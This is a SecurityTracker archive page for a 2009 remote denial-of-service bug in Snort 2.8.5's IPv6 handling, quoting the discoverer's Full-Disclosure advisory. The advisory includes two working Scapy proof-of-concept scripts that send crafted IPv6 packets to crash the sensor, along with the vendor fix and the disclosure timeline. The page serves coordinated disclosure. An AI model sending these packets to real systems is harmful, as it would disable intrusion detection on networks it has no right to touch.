SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   Cisco Snort Vendors:   snort.org
Snort Bug in Monitoring IPv6 Data Lets Remote Users Deny Service
SecurityTracker Alert ID:  1023076
SecurityTracker URL:  http://securitytracker.com/id/1023076
CVE Reference:   CVE-2009-3641   (Links to External Site)
Updated:  Oct 31 2009
Original Entry Date:  Oct 23 2009
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.8.5, possibly earlier versions
Description:   A vulnerability was reported in Snort. A remote user can cause denial of service conditions.

A remote user can send specially crafted IPv6 data to cause the target service to crash.

Systems compiled with IPv6 support and run in verbose mode are affected.

Sourcefire 3D Sensor is not affected.

The vendor was notified on October 14, 2009.

Laurent Gaffie reported this vulnerability.

Impact:   A remote user can cause the target service to crash.
Solution:   The vendor has issued a fix (2.8.5.1).

The vendor's advisory is available at:

http://vrt-sourcefire.blogspot.com/2009/10/snort-2851-release.html

Vendor URL:  www.snort.org/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Snort <= 2.8.5 IPV6 Remote DoS

--===============1176830778==
Content-Type: multipart/alternative; boundary=001636c5be6c4798ea04768d2ca2

--001636c5be6c4798ea04768d2ca2
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
- Date: October 22th, 2009
- Discovered by: Laurent Gaffi=E9
- Severity: Low
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

I. VULNERABILITY
-------------------------
Snort <=3D 2.8.5 IPV6 Remote DoS


II. DESCRIPTION
-------------------------
A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6
crafted packet
To trigger theses bugs you need to have compiled snort with the
--enable-ipv6 option, and run it in verbose mode (-v)

III. PROOF OF CONCEPT
-------------------------
You can reproduce theses two differents bugs easily by using the Python
low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1) #only works on x86

#/usr/bin/env python
from scapy.all import *
u =3D "\x92"+"\x02" * 6
send(IPv6(dst=3D"IPv6_addr_here", nh=3D6)/u) #nh6 -> TCP

2) # works x86,x64

#/usr/bin/env python
from scapy.all import *

z =3D "Q" * 30
send(IPv6(dst=3D"IPv6_ADDR_HERE",nh=3D1)/ICMPv6NIQueryNOOP(type=3D4)/z) #nh=
1 ->
icmp (not v6)


IV. SYSTEMS AFFECTED
-------------------------
Theses proof of concept as been tested on snort:
- 2.8.5

V. NOT AFFECTED
-------------------------
Sourcefire 3D Sensor


VI. SOLUTION
-------------------------
A new version correcting theses issues as been released (2.8.5.1) :

http://www.snort.org/downloads


VII. REFERENCES
-------------------------
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/

VIII. REVISION HISTORY
-------------------------
October 14th, 2009: First issue discovered, advisory send to snort team.
October 14th, 2009: Snort security team confirm the bug.
October 16th, 2009: Second issue discovered, advisory send to snort team.
October 20th, 2009: Snort security team confirm the bug.
October 22th, 2009: Snort team released a new version.


IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffi=E9
Laurent.gaffie{remove-this}(at)gmail.com

--001636c5be6c4798ea04768d2ca2
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>- Date: Oct=
ober 22th, 2009<br>- Discovered by: Laurent Gaffi=E9<br>- Severity: Low<br>=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>I. VULN=
ERABILITY<br>-------------------------<br>
Snort &lt;=3D 2.8.5 IPV6 Remote DoS<br><br><br>II. DESCRIPTION<br>---------=
----------------<br>A remote DoS was present in Snort 2.8.5 when parsing so=
me specialy IPv6 crafted packet<br>To trigger theses bugs you need to have =
compiled snort with the --enable-ipv6 option, and run it in verbose mode (-=
v)<br>
<br>III. PROOF OF CONCEPT<br>-------------------------<br>You can reproduce=
 theses two differents bugs easily by using the Python low-level networking=
 lib Scapy<br>(<a href=3D"http://www.secdev.org/projects/scapy/files/scapy-=
latest.zip">http://www.secdev.org/projects/scapy/files/scapy-latest.zip</a>=
)<br>
<br>1) #only works on x86<br><br>#/usr/bin/env python<br>from scapy.all imp=
ort *<br>u =3D &quot;\x92&quot;+&quot;\x02&quot; * 6<br>send(IPv6(dst=3D&qu=
ot;IPv6_addr_here&quot;, nh=3D6)/u) #nh6 -&gt; TCP<br><br>2) # works x86,x6=
4<br>
<br>#/usr/bin/env python<br>from scapy.all import *<br><br>z =3D &quot;Q&qu=
ot; * 30<br>send(IPv6(dst=3D&quot;IPv6_ADDR_HERE&quot;,nh=3D1)/ICMPv6NIQuer=
yNOOP(type=3D4)/z) #nh1 -&gt; icmp (not v6)<br><br><br>IV. SYSTEMS AFFECTED=
<br>
-------------------------<br>Theses proof of concept as been tested on snor=
t:<br>- 2.8.5<br><br>V. NOT AFFECTED<br>-------------------------<br>Source=
fire 3D Sensor<br><br><br>VI. SOLUTION<br>-------------------------<br>
A new version correcting theses issues as been released (2.8.5.1) :<br><br>=
<a href=3D"http://www.snort.org/downloads">http://www.snort.org/downloads</=
a><br><br><br>VII. REFERENCES<br>-------------------------<br><a href=3D"ht=
tp://www.snort.org/">http://www.snort.org/</a><br>
<a href=3D"http://vrt-sourcefire.blogspot.com/">http://vrt-sourcefire.blogs=
pot.com/</a><br><br>VIII. REVISION HISTORY<br>-------------------------<br>=
October 14th, 2009: First issue discovered, advisory send to snort team.<br=
>
October 14th, 2009: Snort security team confirm the bug.<br>October 16th, 2=
009: Second issue discovered, advisory send to snort team.<br>October 20th,=
 2009: Snort security team confirm the bug.<br>October 22th, 2009: Snort te=
am released a new version.<br>
<br><br>IX. CREDITS<br>-------------------------<br>This vulnerability has =
been discovered by Laurent Gaffi=E9<br>Laurent.gaffie{remove-this}(at)<a hr=
ef=3D"http://gmail.com">gmail.com</a> <br>

--001636c5be6c4798ea04768d2ca2--


--===============1176830778==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1176830778==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC